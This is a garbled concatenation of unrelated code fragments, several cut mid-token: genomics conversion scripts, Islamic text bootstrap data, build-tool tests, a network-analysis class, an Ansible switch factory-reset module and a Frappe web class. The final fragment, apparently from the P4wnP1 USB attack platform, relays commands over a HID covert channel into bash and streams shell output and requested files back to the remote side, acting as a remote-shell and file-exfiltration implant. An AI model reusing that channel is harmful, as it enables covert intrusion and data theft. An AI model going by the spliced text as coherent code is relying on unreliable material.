b('../opensnp_datadump.current/*.23andme.txt') fifteen_mb = 15 * 1000 * 1000 non_junk_files = [path for path in all_twenty3_and_me_files if os.path.getsize(path) > fifteen_mb] return non_junk_files def run_plink_format(usable_files): """Reformat the 23andMe files into plink binary stuff""" for f in usable_files: gid = f.split("/")[-1].split("_")[1].replace("file","") call = "../plink_v190/plink --23file "+ f + " F" + gid
+ "ID" + gid + "I 1" call += " --out ../plink_binaries/" + gid print "convert gid " + gid subprocess.call(call,shell=True) usable_files = twenty3_and_me_files() run_plink_format(usable_files)
# -*- coding: utf-8 -*- """ Contains data that initially get added to the database to bootstrap it. """ from __future__ import unicode_literals # pylint: disable=invalid-name prophet_muhammad = { 'title': u'Prophet', 'display_name': u'النبي محمد (صلى الله عليه وآله وسلم)'.strip(), 'full_name': u'محمد بن عبد الله بن عبد المطلب بن هاشم'.strip(), 'brief_desc': u'نبي الإسلام، عليه وعلى آله الصلاة والسلام'.strip(), 'birth_year': 570, 'death_year': 632 } imam_alsadiq = { 'title': u'Imam', 'display_name': u'الإمام الصادق (عليه السلام)', 'full_name': u"جعفر بن محمد الصادق", 'brief_desc': u'إمام من أئمة المسلمين وسادس أئمة الشيعة الاثنى عشرية' } # pylint: disable=line-too-long first_shia_hadith_text = u''' نضر الله عبدا سمع مقالتي فوعاها وحفظها وبلغها من لم يسمعها، فرب حامل فقه غير فقيه ورب حامل فقه إلى من هو أفقه منه، ثلاث لا يغل عليهن قلب امرئ مسلم: إخلاص العمل لله، والنصحية لائمة المسلمين، واللزوم لجماعتهم، فإن دعوتهم محيطة من ورائهم، المسلمون إخوة تتكافى دماؤهم ويسعى بذمتهم أدناهم. '''.strip() first_sunni_hadith_text = u''' نضر الله عبدا سمع مقالتي فحفظها ووعاها واداها ، فرب حامل فقه غير فقيه ، ورب حامل فقه الى من هو افقه منه ، ثلاث لا يغل عليهن قلب مسلم : اخلاص العمل لله ، والنصيحة للمسلمين ، ولزوم جماعتهم ، فان دعوتهم تحيط من ورايهم '''.strip() # pylint: enable=line-too-long shia_first_hadith_persons = [ u"عبد الله بن أبي يعفور العبدي".strip(), u"ابان بن عثمان الأحمر البجلي".strip(), u"احمد بن محمد بن عمرو بن ابي نصر البزنطي".strip(), u"احمد بن عيسى".strip()] sunni_first_hadith_persons = [ u"عبد الله بن مسعود".strip(), u"عبد الرحمن بن عبد الله الهذلي".strip(), u"عبد الملك بن عمير اللخمي".strip(), u"سفيان بن عيينة الهلالي".strip(), ] holy_quran = u"القرآن الكريم" holy_quran_suras = [ u"الفاتحة", u"البقرة", u"آل عمران", u"النساء", u"المائدة", u"اﻷنعام", u"اﻷعراف", u"اﻷنفال", u"التوبة", u"يونس", u"هود", u"يوسف", u"الرعد", u"إبراهيم", u"الحجر", u"النحل", u"اﻹسراء", u"الكهف", u"مريم", u"طه", u"اﻷنبياء", u"الحج", u"المؤمنون", u"النور", u"الفرقان", u"الشعراء", u"النمل", u"القصص", u"العنكبوت", u"الروم", u"لقمان", u"السجدة", u"اﻷحزاب", u"سبأ", u"فاطر", u"يس", u"الصافات", u"ص", u"الزمر", u"غافر", u"فصلت", u"الشورى", u"الزخرف", u"الدخان", u"الجاثية", u"اﻷحقاف", u"محمد", u"ا
لفتح", u"الحجرات", u"ق", u"الذاريات", u"الطور", u"النجم", u"الق
مر", u"الرحمن", u"الواقعة", u"الحديد", u"المجادلة", u"الحشر", u"الممتحنة", u"الصف", u"الجمعة", u"المنافقون", u"التغابن", u"الطلاق", u"التحريم", u"الملك", u"القلم", u"الحاقة", u"المعارج", u"نوح", u"الجن", u"المزمل", u"المدثر", u"القيامة", u"اﻹنسان", u"المرسلات", u"النبأ", u"النازعات", u"عبس", u"التكوير", u"الانفطار", u"المطففين", u"الانشقاق", u"البروج", u"الطارق", u"اﻷعلى", u"الغاشية", u"الفجر", u"البلد", u"الشمس", u"الليل", u"الضحى", u"الشرح", u"التين", u"العلق", u"القدر", u"البينة", u"الزلزلة", u"العاديات", u"القارعة", u"التكاثر", u"العصر", u"الهمزة", u"الفيل", u"قريش", u"الماعون", u"الكوثر", u"الكافرون", u"النصر", u"المسد", u"اﻹخلاص", u"الفلق", u"الناس"] # كتاب الكافي، باب ما امر النبي صلى الله عليه وآله بالنصيحة لائمة # المسلمين واللزوم لجماعتهم ومن هم؟ # http://www.mezan.net/books/kafi/kafi1/html/ara/books/al-kafi-1/166.html shia_first_hadith_book = u"الكافي" # مسند الشافعي، حديث 1105 # https://library.islamweb.net/hadith/display_hbook.php?bk_no=51&hid=1105&pid= sunni_first_hadith_book = u"مسند الشافعي" first_hadith_tag = u'علم الحديث'
class Solution(object): def checkPossibility(self, n
ums): """ :type nums: List[int] :rtype: bool """ n = len(nums) t = 0 for i in xrange(n-1): if nums[i] > nums[i+1]: if i-1 < 0 or i+2 > n-1: t += 1 elif nums[i-1] <= nums[i+1]: t += 1 elif nums[i+2] >= nums[i]: t +=
1 else: return False return True if t <= 1 else False
Mock import pytest from pants.base.exceptions import ResolveError from pants.build_graph.address import Address from pants.engine.fs import ( EMPTY_DIRECTORY_DIGEST, Digest, FileContent, InputFilesContent, Workspace, ) from pants.engine.interactive_runner import InteractiveProcessRequest, InteractiveRunner from pants.engine.legacy.graph import HydratedTargetsWithOrigins, HydratedTargetWithOrigin from pants.engine.legacy.structs import TargetAdaptorWithOrigin from pants.engine.rules import UnionMembership from pants.rules.core.fmt_test import FmtTest from pants.rules.core.test import ( AddressAndTestResult, CoverageDataBatch, CoverageReport, FilesystemCoverageReport, Status, Test, TestDebugRequest, TestResult, TestRunner, WrappedTestRunner, run_tests, ) from pants.testutil.engine.util import MockConsole, MockGet, run_rule from pants.testutil.test_base import TestBase from pants.util.ordered_set import OrderedSet # TODO(#9141): replace this with a proper util to create `GoalSubsystem`s class MockOptions: def __init__(self, **values): self.values = Mock(**values) class MockTestRunner(TestRunner, metaclass=ABCMeta): @staticmethod def is_valid_target(_: TargetAdaptorWithOrigin) -> bool: return True @staticmethod @abstractmethod def status(_: Address) -> Status: pass @staticmethod def stdout(_: Address) -> str: return "" @staticmethod def stderr(_: Address) -> str: return "" @property def test_result(self) -> TestResult: address = self.adaptor_with_origin.adaptor.address return TestResult(self.status(address), self.stdout(address), self.stderr(address)) class SuccessfulTestRunner(MockTestRunner): @staticmethod def status(_: Address) -> Status: return Status.SUCCESS @staticmethod def stdout(address: Address) -> str: return f"Successful test runner: Passed for {address}!" class ConditionallySucceedsTestRunner(MockTestRunner): @staticmethod def status(address: Address) -> Status: return Status.FAILURE if address.target_name == "bad" else Status.SUCCESS @staticmethod def stdout(address: Address) -> str: return ( f"Conditionally succeeds test runner: Passed for {address}!" if address.target_name != "bad" else "" ) @staticmethod def stderr(address: Address) -> str: return ( f"Conditionally succeeds test runner: Had an issue for {address}! Oh no!" if address.target_name == "bad" else "" ) class InvalidTargetTestRunner(MockTestRunner): @staticmethod def is_valid_target(_: TargetAdaptorWithOrigin) -> bool: return False @staticmethod def status(_: Address) -> Status: return Status.FAILURE class TestTest(TestBase): def make_ipr(self) -> InteractiveProcessRequest: input_files_content = InputFilesContent( (FileContent(path="program.py", content=b"def test(): pass"),) ) digest = self.request_single_product(Digest, input_files_content)
return InteractiveProcessRequest( argv=("/usr/bin/python", "program.py",), run_in_workspace=False, input_files=digest, ) def run_test_rule( self, *, test_runner: Type[TestRunner], t
argets: List[HydratedTargetWithOrigin], debug: bool = False, ) -> Tuple[int, str]: console = MockConsole(use_colors=False) options = MockOptions(debug=debug, run_coverage=False) interactive_runner = InteractiveRunner(self.scheduler) workspace = Workspace(self.scheduler) union_membership = UnionMembership({TestRunner: OrderedSet([test_runner])}) def mock_coordinator_of_tests( wrapped_test_runner: WrappedTestRunner, ) -> AddressAndTestResult: runner = wrapped_test_runner.runner return AddressAndTestResult( address=runner.adaptor_with_origin.adaptor.address, test_result=runner.test_result, # type: ignore[attr-defined] ) result: Test = run_rule( run_tests, rule_args=[ console, options, interactive_runner, HydratedTargetsWithOrigins(targets), workspace, union_membership, ], mock_gets=[ MockGet( product_type=AddressAndTestResult, subject_type=WrappedTestRunner, mock=lambda wrapped_test_runner: mock_coordinator_of_tests(wrapped_test_runner), ), MockGet( product_type=TestDebugRequest, subject_type=TestRunner, mock=lambda _: TestDebugRequest(self.make_ipr()), ), MockGet( product_type=CoverageReport, subject_type=CoverageDataBatch, mock=lambda _: FilesystemCoverageReport( result_digest=EMPTY_DIRECTORY_DIGEST, directory_to_materialize_to=PurePath("mockety/mock"), ), ), ], union_membership=union_membership, ) return result.exit_code, console.stdout.getvalue() def test_empty_target_noops(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[FmtTest.make_hydrated_target_with_origin(include_sources=False)], ) assert exit_code == 0 assert stdout.strip() == "" def test_invalid_target_noops(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=InvalidTargetTestRunner, targets=[FmtTest.make_hydrated_target_with_origin()], ) assert exit_code == 0 assert stdout.strip() == "" def test_single_target(self) -> None: target_with_origin = FmtTest.make_hydrated_target_with_origin() address = target_with_origin.target.adaptor.address exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[target_with_origin], ) assert exit_code == 0 assert stdout == dedent( f"""\ {address} stdout: {SuccessfulTestRunner.stdout(address)} {address} ..... SUCCESS """ ) def test_multiple_targets(self) -> None: good_target = FmtTest.make_hydrated_target_with_origin(name="good") good_address = good_target.target.adaptor.address bad_target = FmtTest.make_hydrated_target_with_origin(name="bad") bad_address = bad_target.target.adaptor.address exit_code, stdout = self.run_test_rule( test_runner=ConditionallySucceedsTestRunner, targets=[good_target, bad_target], ) assert exit_code == 1 assert stdout == dedent( f"""\ {good_address} stdout: {ConditionallySucceedsTestRunner.stdout(good_address)} {bad_address} stderr: {ConditionallySucceedsTestRunner.stderr(bad_address)} {good_address} ..... SUCCESS {bad_address} ..... FAILURE """ ) def test_single_debug_target(self) -> None: exit_code, stdout = self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[FmtTest.make_hydrated_target_with_origin()], debug=True, ) assert exit_code == 0 def test_multiple_debug_targets_fail(self) -> None: with pytest.raises(ResolveError): self.run_test_rule( test_runner=SuccessfulTestRunner, targets=[
#!/usr/bin/env python2.7 import logging import num
py as np from .analysis import Analysis class HopCountAnalysis(Analysis): def __init__(self, scenario, locati
on, repetitions, csv): Analysis.__init__(self, scenario, location, "hopCount", repetitions, csv) self.logger = logging.getLogger('baltimore.analysis.HopCountAnalysis') self.logger.debug('creating an instance of HopCountAnalysis for scenario %s', scenario) self.data_min = {} self.data_max = {} self.data_median = {} self.data_std = {} self.data_avg = {} def evaluate(self, experiment_results, is_verbose=False): self.logger.info("running hop count analysis") hop_count = {} raw_data = [] for repetition in experiment_results: nodes = experiment_results.nodes_have_metric("hopCount", repetition) for node in nodes: data = experiment_results.get_tuple_metric_per_node("hopCount", node, repetition) for element in data: raw_data.append([repetition, node, float(element[0]), int(element[1])]) if node not in hop_count: hop_count[node] = [] hop_count[node].append(raw_data) raw_data = [] for node, data in list(hop_count.items()): hop_count_data = [element[3] for repetition in data for element in repetition] self.data_min[node] = np.amin(hop_count_data) self.data_max[node] = np.amax(hop_count_data) self.data_median[node] = np.median(hop_count_data) self.data_std[node] = np.std(hop_count_data) self.data_avg[node] = np.average(hop_count_data) self.logger.info("Printing hop count statistics for node %s", node) self.logger.info("Minimum hop count = %f nodes", self.data_min[node]) self.logger.info("Maximum hop count = %f nodes", self.data_max[node]) self.logger.info("Std.Deviation = %f nodes", self.data_std[node]) self.logger.info("Average hop count = %f nodes", self.data_avg[node]) self.logger.info("Median hop count = %f nodes", self.data_median[node]) if self.draw: for node in hop_count: self.metric = "hop_count_node-" + str(node) self.plot_boxplot("Average Hop Count (Node " + str(node) + ")", "Repetition", "Hop Count [ms]", self.data_avg[node]) if self.csv: self.export_csv() self.export_csv_raw(hop_count) def export_csv(self): self.metric = "hopCount" file_name = self.scenario + "_" + self.metric + "_aggregated.csv" disclaimer = [['#'],['#'], ['# ' + str(self.date) + ' - hop count for scenario ' + self.scenario],['# aggregated over ' + str(self.repetitions) + ' repetitions'],['#']] header = ['node', 'min', 'max', 'median', 'std', 'avg'] data = [] for node in self.data_min: data.append([node, self.data_min[node], self.data_max[node], self.data_median[node], self.data_std[node], self.data_avg[node]]) self._write_csv_file(file_name, disclaimer, header, data) def export_csv_raw(self, raw_data): self.metric = "hopCount" file_name = self.scenario + "_" + self.metric + ".csv" disclaimer = [['#'],['#'], ['# ' + str(self.date) + ' - hop count for scenario ' + self.scenario],['#']] header = ['node', 'repetition', 'timestamp', 'hop count'] data = [] for node, hop_counts in list(raw_data.items()): for values in hop_counts: for element in values: data.append([node, element[0], element[2], element[3]]) self._write_csv_file(file_name, disclaimer, header, data)
or arg in args: fixed_parts = [] if arg.startswith("$<BUILD_INTERFACE:"): arg = arg[len("$<BUILD_INTERFACE:"): -1] parts = rex.split(arg) for part in parts: if part.startswith("${"): name = part[2:-1].lower() if name in variables: value = variables[name] if len(value)==1: fixed_parts.append(variables[name][0]) else: fixed_args.extend(value) else: print("Undefined cmake variable '" + name + "' in " + filename) else: fixed_parts.append(part) fixed_args.append(''.join(fixed_parts)) return fixed_args def __FetchCommands(lexer): topmode = True command_list = [] command = None args = [] tok = lexer.token() while 1: if not tok: if command: command_list.append( (command,args) ) break # No more input if topmode: if tok.type=="COMMAND": command = tok.value topmode = False else: print("Fail") # Fail tok = lexer.token() else: # Grab arguments if tok.type=="COMMAND": if command: command_list.append( (command,args) ) command = None args = [] topmode = True continue args.append(tok.value) tok = lexer.token() return command_list if __name__=="__main__": #print("Testing") #lexer = cmakelexer.CMakeLexer() print(ExtractInstallFiles(filename="/home/sbe/devel/svn/kde/trunk/KDE/kdeedu/marble/src/lib/CMakeLists.txt")) def foo(): ExtractInstallFiles(input=""" find_package(KDE4 REQUIRED) include (KDE4Defaults) include_directories(${CMAKE_CURRENT_SOURCE_DIR} ${KDEBASE_WORKSPACE_SOURCE_DIR}/libs ${CMAKE_CURRENT_SOURCE_DIR}/.. ${KDE4_INCLUDES} ${OPENGL_INCLUDE_DIR}) add_subdirectory(tests) add_definitions(-DKDE_DEFAULT_DEBUG_AREA=1209) ########### next target ############### set(plasmagik_SRCS packagemetadata.cpp packagestructure.cpp package.cpp ) set(plasma_LIB_SRCS ${plasmagik_SRCS} abstractrunner.cpp animationdriver.cpp animator.cpp applet.cpp appletbrowser.cpp appletbrowser/customdragtreeview.cpp appletbrowser/kcategorizeditemsview.cpp appletbrowser/kcategorizeditemsviewdelegate.cpp appletbrowser/kcategorizeditemsviewmodels.cpp appletbrowser/openwidgetassistant.cpp appletbrowser/plasmaappletitemmodel.cpp configxml.cpp containment.cpp corona.cpp datacontainer.cpp dataengine.cpp dataenginemanager.cpp delegate.cpp dialog.cpp extender.cpp extenderitem.cpp paintutils.cpp panelsvg.cpp plasma.cpp popupapplet.cpp private/applethandle.cpp private/datacontainer_p.cpp private/desktoptoolbox.cpp private/nativetabbar.cpp private/packages.cpp private/paneltoolbox.cpp private/toolbox.cpp private/tooltip.cpp querymatch.cpp runnercontext.cpp runnermanager.cpp scripting/appletscript.cpp scripting/dataenginescript.cpp scripting/runnerscript.cpp scripting/scriptengine.cpp service.cpp servicejob.cpp svg.cpp theme.cpp tooltipmanager.cpp uiloader.cpp version.cpp view.cpp wallpaper.cpp widgets/checkbox.cpp widgets/combobox.cpp widgets/flash.cpp widgets/frame.cpp widgets/groupbox.cpp widgets/icon.cpp widgets/label.cpp widgets/lineedit.cpp widgets/meter.cpp widgets/pushbutton.cpp widgets/radiobutton.cpp widgets/signalplotter.cpp widgets/slider.cpp widgets/tabbar.cpp widgets/textedit.cpp widgets/webcontent.cpp ) kde4_add_ui_files ( plasma_LIB_SRCS appletbrowser/kcategorizeditemsviewbase.ui ) if(QT_QTOPENGL_FOUND AND OPENGL_FOUND) MESSAGE(STATUS "Adding support for OpenGL applets to libplasma") set(plasma_LIB_SRCS ${plasma_LIB_SRCS} glapplet.cpp) endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND) kde4_add_library(plasma SHARED ${plasma_LIB_SRCS}) target_link_libraries(plasma ${KDE4_KIO_LIBS} ${KDE4_KFILE_LIBS} ${KDE4_KNEWSTUFF2_LIBS} ${QT_QTUITOOLS_LIBRARY} ${QT_QTWEBKIT_LIBRARY} ${KDE4_THREADWEAVER_LIBRARIES} ${KDE4_SOLID_LIBS} ${X11_LIBRARIES}) if(QT_QTOPENGL_FOUND AND OPENGL_FOUND) target_link_libraries(plasma ${QT_QTOPENGL_LIBRARY} ${OPENGL_gl_LIBRARY}) endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND) set_target_properties(plasma PROPERTIES VERSION 3.0.0 SOVERSION 3 ${KDE4_DISABLE_PROPERTY_}LINK_INTERFACE_LIBRARIES "${KDE4_KDEUI_LIBS}" ) install(TARGETS plasma ${INSTALL_TARGETS_DEFAULT_ARGS}) ########### install files ############### set(plasmagik_HEADERS packagemetadata.h packagestructure.h package.h ) install(FILES ${plasmagik_HEADERS} DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/ COMPONENT Devel) set(plasma_LIB_INCLUDES abstractrunner.h animationdriver.h animator.h applet.h appletbrowser.h configxml.h containment.h corona.h datacontainer.h
dataengine.h dataenginemanager.h delegate.h dialog.h extender.h extenderitem.h paintutils.h panelsvg.h plasma.h plasma_export.h popupapplet.h querymatch.h runnercontext.h runnermanager.h service.h servicejob.h svg.h theme.h tooltipmanager.h uiloader.h tooltipmanager.h version.h view.h wallpaper.h) if(QT_QTOPENGL_FOUND AND OPENGL_FOUND) set
(plasma_LIB_INCLUDES ${plasma_LIB_INCLUDES} glapplet.h) endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND) install(FILES ${plasma_LIB_INCLUDES} DESTINATION ${INCLUDE_INSTALL_DIR}/plasma COMPONENT Devel) install(FILES widgets/checkbox.h widgets/combobox.h widgets/flash.h widgets/frame.h widgets/groupbox.h widgets/icon.h widgets/label.h widgets/lineedit.h widgets/meter.h widgets/pushbutton.h widgets/radiobutton.h widgets/signalplotter.h widgets/slider.h widgets/tabbar.h widgets/textedit.h widgets/webcontent.h DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/widgets COMPONENT Devel) install(FILES scripting/appletscript.h scripting/dataenginescript.h scripting/runnerscript.h scripting/scriptengine.h DESTINATION ${INCLUDE_INSTALL_DIR}/plasma/scripting COMPONENT Devel) install(FILES includes/AbstractRunner includes/AnimationDriver includes/Animator includes/Applet includes/AppletBrowser includes/AppletScript includes/CheckBox includes/ComboBox includes/ConfigXml includes/Containment includes/Corona includes/DataContainer includes/DataEngine includes/DataEngineManager includes/DataEngineScript includes/Delegate includes/Dialog includes/Extender includes/ExtenderItem includes/Flash includes/GroupBox includes/Icon includes/Label includes/LineEdit includes/Meter includes/Package includes/PackageMetadata includes/PackageStructure includes/PaintUtils includes/PanelSvg includes/Plasma includes/PopupApplet includes/PushButton includes/QueryMatch includes/RadioButton includes/RunnerContext includes/RunnerManager includes/RunnerScript includes/ScriptEngine includes/Service includes/ServiceJob includes/SignalPlotter includes/Slider includes/Svg includes/TabBar includes/TextEdit includes/ToolTipManager includes/Theme includes/UiLoader includes/View includes/Version includes/Wallpaper includes/WebContent DESTINATION ${INCLUDE_INSTALL_DIR}/KDE/Plasma COMPONENT Devel) if(QT_QTOPENGL_FOUND AND OPENGL_FOUND) install(FILES includes/GLApplet DESTINATION ${INCLUDE_INSTALL_DIR}/KDE/Plasma COMPONENT Devel) endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND) install(FILES servicetypes/plasma-animator.desktop servicetypes/plasma-applet
import os import re im
port cmd import sys import time import util host = sys.argv[1] cmd.ru
n ("virsh shutdown %s"%(host)) while util.vm_is_running(host): time.sleep(1)
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import (absolute_import, division, print_function) __metaclass__ = type # # Copyright (C)
2017 Lenovo, Inc. # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public
License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # # Module to Reset to factory settings of Lenovo Switches # Lenovo Networking # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: cnos_factory author: "Anil Kumar Muraleedharan (@amuraleedhar)" short_description: Reset the switch's startup configuration to default (factory) on devices running Lenovo CNOS description: - This module allows you to reset a switch's startup configuration. The method provides a way to reset the startup configuration to its factory settings. This is helpful when you want to move the switch to another topology as a new network device. This module uses SSH to manage network device configuration. The results of the operation can be viewed in results directory. For more information about this module from Lenovo and customizing it usage for your use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_factory.html) version_added: "2.3" extends_documentation_fragment: cnos options: {} ''' EXAMPLES = ''' Tasks : The following are examples of using the module cnos_reload. These are written in the main.yml file of the tasks directory. --- - name: Test Reset to factory cnos_factory: host: "{{ inventory_hostname }}" username: "{{ hostvars[inventory_hostname]['ansible_ssh_user'] }}" password: "{{ hostvars[inventory_hostname]['ansible_ssh_pass'] }}" deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}" outputfile: "./results/test_factory_{{ inventory_hostname }}_output.txt" ''' RETURN = ''' msg: description: Success or failure message returned: always type: string sample: "Switch Startup Config is Reset to factory settings" ''' import sys try: import paramiko HAS_PARAMIKO = True except ImportError: HAS_PARAMIKO = False import time import socket import array import json import time import re try: from ansible.module_utils.network.cnos import cnos HAS_LIB = True except: HAS_LIB = False from ansible.module_utils.basic import AnsibleModule from collections import defaultdict def main(): module = AnsibleModule( argument_spec=dict( outputfile=dict(required=True), host=dict(required=True), username=dict(required=True), password=dict(required=True, no_log=True), enablePassword=dict(required=False, no_log=True), deviceType=dict(required=True),), supports_check_mode=False) username = module.params['username'] password = module.params['password'] enablePassword = module.params['enablePassword'] cliCommand = "save erase \n" outputfile = module.params['outputfile'] hostIP = module.params['host'] deviceType = module.params['deviceType'] output = "" if not HAS_PARAMIKO: module.fail_json(msg='paramiko is required for this module') # Create instance of SSHClient object remote_conn_pre = paramiko.SSHClient() # Automatically add untrusted hosts (make sure okay for security policy in your environment) remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # initiate SSH connection with the switch remote_conn_pre.connect(hostIP, username=username, password=password) time.sleep(2) # Use invoke_shell to establish an 'interactive session' remote_conn = remote_conn_pre.invoke_shell() time.sleep(2) # Enable and enter configure terminal then send command output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn) output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn) # Make terminal length = 0 output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn) # cnos.debugOutput(cliCommand) # Send the CLi command output = output + cnos.waitForDeviceResponse(cliCommand, "[n]", 2, remote_conn) output = output + cnos.waitForDeviceResponse("y" + "\n", "#", 2, remote_conn) # Save it into the file file = open(outputfile, "a") file.write(output) file.close() errorMsg = cnos.checkOutputForError(output) if(errorMsg is None): module.exit_json(changed=True, msg="Switch Startup Config is Reset to factory settings ") else: module.fail_json(msg=errorMsg) if __name__ == '__main__': main()
import os import unittest from conans.client.cache.cache import CONAN_CONF from conans.client.conf import ConanClientConfigParser from conans.paths import DEFAULT_PROFILE_NAME from conans.test.utils.test_files import temp_folder from conans.util.files import save default_client_conf = '''[storage] path: ~/.conan/data [log] trace_file = "Path/with/quotes" [general] ''' default_profile = ''' [settings] arch=x86_64 build_type=Release compiler=gcc compiler.libcxx=libstdc++ compiler.version=4.9 os=Linux ''' class ClientConfTest(unittest.TestCase): def test_quotes(self): tmp_dir = temp_folder() save(os.path.join(tmp_dir, CONAN_CONF), default_client_conf) save(os.path.join(tmp_dir, DEFAULT_PROFILE_NAME), default_profile) config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF)) self.assertEqual(config.env_vars["CONAN_TRACE_FILE"], "Path/with/quotes") def test_proxies(self): tmp_dir = temp_folder() save(os.path.join(tmp_dir, CONAN_CONF), "") config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF)) self.assertEq
ual(None, config.proxies) save(os.path.
join(tmp_dir, CONAN_CONF), "[proxies]") config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF)) self.assertNotIn("no_proxy", config.proxies) save(os.path.join(tmp_dir, CONAN_CONF), "[proxies]\nno_proxy=localhost") config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF)) self.assertEqual(config.proxies["no_proxy"], "localhost")
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import cstr, filter_strip_join from frappe.website.website_generator import WebsiteGenerator from frappe.contacts.address_and_contact import load_address_and_contact class SalesPartner(WebsiteGenerator): website = frappe._dict( page_title_field = "partner_name", condition_field = "show_in_website", template = "templates/generators/sales_partner.html" ) def onload(self): """Load address and contacts in `__onload`""" load_address_and_contact(self, "sales_partner") def autoname(self): self.name = self.partner_name def validate(self): if not self.route: self.route = "partners/" + self.scrub(self.part
ner_name) super(SalesPartner, self).validate() if self.partner_website and not self.partner_website.startswith("http"): self.partner_website = "http://" + self.partner_website def get_context(self, context): address = frappe.db.get_value("Address", {"sales_partner": self.name, "is_primary_address": 1}, "*", as_dict=True) if address: city_state = ", ".join(filter(None, [address.city, address.state])) address_rows = [address.address_line1, address.address_line2, ci
ty_state, address.pincode, address.country] context.update({ "email": address.email_id, "partner_address": filter_strip_join(address_rows, "\n<br>"), "phone": filter_strip_join(cstr(address.phone).split(","), "\n<br>") }) return context
gment_assembler del fragment_assembler[stream_id] else: # append data to stream fragment_assembler[stream_id][2] += data #print repr(fragment_assembler[stream_id][2]) else: # start stream, if not existing data_arr = [src, dst, data] fragment_assembler[stream_id] = data_arr def send_datastream(qout, src=1, dst=1, data=""): # split data into chunks fitting into packet payload (60 bytes) chnks = chunks(data) for chunk in chnks: data_arr = [src, dst, chunk] qout.put(data_arr) # append empty packet to close stream qout.put([src, dst, ""]) def send_packet(f, src=1, dst=1, data="", rcv=0): snd = len(data) #print "Send size: " + str(snd) packet = struct.pack('!BBBB60s', src, dst, snd, rcv, data) #print packet.encode("hex") f.write(packet) def read_packet(f): hidin = f.read(0x40) #print "Input received (" + str(len(hidin)) + " bytes):" #print hidin.encode("hex") data = struct.unpack('!BBBB60s', hidin) src = data[0] dst = data[1] snd = data[2] rcv = data[3] # reduce msg to real size msg = data[4][0:snd] return [src, dst, snd, rcv, msg] def process_input(qin, subproc): # HID in loop, should ho to thread # check if input queue contains data while True: if not qin.empty(): input = qin.get() src=input[0] dst=input[1] stream=input[2] # process received input # stdin (redirect to bash) if dst == 1: command=stream if command.upper() == "RESET_BASH": # send sigint to bash print "Restarting bash process" reset_bash(subproc) else: print "running command '" + command + "'" run_local_command(command, subproc) # stdout elif dst == 2: print "Data received on stdout" print stream pass # stderr elif dst == 3: pass # getfile elif dst == 4: print "Data receiveced on dst=4 (getfile): " + stream args=stream.split(" ",3) if (len(args) < 3): # too few arguments, echo this back with src=2, dst=3 (stderr) print "To few arguments" send_datastream(qout, 4, 3, "P4wnP1 received 'getfile' with too few arguments") # ToDo: files are reassembled here, this code should be moved into a separate method else: # check if first word is "getfile" ignore otherwise if not args[0].strip().lower() == "getfile": send_datastream(qout, 4, 3, "P4wnP1 received data on dst=4 (getfile) but wrong request format was choosen") continue filename = args[1].strip() varname = args[2].strip() content = None # try to open file, send error if not possible try: with open(filename, "rb") as f: content = f.read() # naive approach, reading whole file at once (we split into chunks anyway) except IOError as e: # deliver Error to Client errorstream send_datastream(qout, 4, 3, "Error on getfile: " + e.strerror) continue # send header print "Varname " + str(varname) send_datastr
eam(qout, 4, 4, "BEGINFILE " + filename + " " + varname) # send filecontent (sould be chunked into multiple streams, but would need reassembling on layer5) # note: The client has to read (and recognize) ASCII based header and footer streams, but content could be in binary form
if content == None: send_datastream(qout, 4, 3, "Error on getfile: No file content read") else: #send_datastream(qout, 4, 4, content) streamchunksize=600 for chunk in chunks(content, streamchunksize): send_datastream(qout, 4, 4, chunk) # send footer send_datastream(qout, 4, 4, "ENDFILE " + filename + " " + varname) else: print "Input in input queue:" print input def run_local_command(command, bash): bash = subproc[0] sin = bash.stdin sin.write(command + "\n") sin.flush() return def process_bash_output(qout, subproc): buf = "" while True: bash = subproc[0] outstream = bash.stdout #print "Reading stdout of bash on " + str(outstream) # check for output which needs to be delivered from backing bash try: r,w,ex = select([outstream], [], [], 0.1) except ValueError: # we should land here if the output stream is closed # because a new bash process was started pass if outstream in r: byte = outstream.read(1) if byte == "\n": # full line received from subprocess, send it to HID # note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client # we set src=1 as we receive bash commands on dst=1 # dst = 2 (stdout of client) send_datastream(qout, 2, 2, buf) # clear buffer buf = "" else: buf += byte def process_bash_error(qout, subproc): buf = "" while True: bash = subproc[0] errstream = bash.stderr # check for output which needs to be delivered from backing bash stderr try: r,w,ex = select([errstream], [], [], 0.1) except ValueError: # we should land here if the error stream is closed # because a new bash process was started pass if errstream in r: byte = errstream.read(1) if byte == "\n": # full line received from subprocess, send it to HID # note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client # dst = 3 (stderr of client) send_datastream(qout, 3, 3, buf) # clear buffer 